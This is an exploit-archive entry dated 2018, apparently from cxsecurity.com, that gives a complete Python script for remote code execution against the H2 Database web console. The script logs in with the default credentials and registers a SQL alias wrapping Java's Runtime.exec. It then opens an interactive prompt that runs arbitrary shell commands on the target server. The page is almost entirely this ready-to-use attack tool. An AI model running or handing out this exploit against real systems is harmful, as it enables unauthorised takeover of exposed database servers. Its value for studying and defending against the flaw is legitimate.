H2 Database Arbitrary Code Execution

2018.04.10
Credit: gambler
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

''' Exploit Title: H2 Database Alias Abuse Date: 05/04/2018 Exploit Author: gambler Vendor Homepage:www.h2database.com Software Link: http://www.h2database.com/html/download.html Version: all versions Tested on: Linux, Mac OS ''' import sys import argparse import html import requests # Blogpost about it # https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html def getCookie(host): url = 'http://{}'.format(host) r = requests.get(url) path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('.jsp','.do') return '{}/{}'.format(url,path) def login(url,user,passwd,database): data = {'language':'en','setting':'Generic+H2+(Embedded)','name':'Generic+H2+(Embedded)','driver':'org.h2.Driver','url':database,'user':user,'password':passwd} r = requests.post(url,data=data) if '<th class="login">Login</th>' in r.text: return False return True def prepare(url): cmd = '''CREATE ALIAS EXECVE AS $$ String execve(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A"); return s.hasNext() ? s.next() : ""; }$$;''' url = url.replace('login','query') r = requests.post(url,data={'sql':cmd}) if not 'Syntax error' in r.text: return url return False def execve(url,cmd): r = requests.post(url,data={'sql':"CALL EXECVE('{}')".format(cmd)}) try: print(html.unescape(r.text.split('</th></tr><tr><td>')[1].split('</td>')[0].replace('<br />','\n').replace('&nbsp;',' ')).encode('utf-8').decode('utf-8','ignore')) except Exception as e: print('Something goes wrong') print(e) if __name__ == "__main__": parser = argparse.ArgumentParser() required = parser.add_argument_group('required arguments') required.add_argument("-H", "--host", metavar='127.0.0.1:4336', help="Specify a host", required=True) required.add_argument("-d", "--database-url", metavar='jdbc:h2~/test', default="jdbc:h2~/test", help="Database URL", required=False) required.add_argument("-u", "--user", metavar='username', default="sa", help="Username to log on H2 Database, default sa", required=False) required.add_argument("-p", "--password", metavar='password', default="", help="Password to log on H2 Database, default None", required=False) args = parser.parse_args() url = getCookie(args.host) if login(url,args.user,args.password,args.database_url): url = prepare(url) if url: while 1: try: cmd = input('cmdline@ ') execve(url,cmd) except KeyboardInterrupt: print("\nProfessores ensinam, nadadores Nadam e Hackers Hackeiam") sys.exit(0) else: print('ERROR - Inserting Payload') print("Something goes wrong, exiting...") else: print("ERROR - Auth") print("Something goes wrong, exiting...")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top